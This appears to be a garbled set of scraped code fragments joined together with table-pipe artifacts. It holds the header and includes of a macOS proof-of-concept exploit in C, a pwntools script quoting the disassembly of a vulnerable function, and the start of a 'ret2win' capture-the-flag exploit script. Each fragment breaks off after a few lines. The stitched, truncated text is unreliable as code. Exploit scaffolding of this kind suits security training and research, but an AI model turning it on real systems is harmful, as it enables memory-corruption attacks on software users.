/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/
#include <errno.h> | |
#include <signal.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> |
from pwn import * | |
# Here's the disassembly for everything | |
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 |
from pwn import * | |
# Set up pwntools to work with this binary | |
elf = context.binary = ELF('ret2win') | |
# Enable verbose logging so we can see exactly what is being sent. | |
context.log_level = 'debug' | |
# Print out the target address | |
info("%#x target", elf.symbols.ret2win) |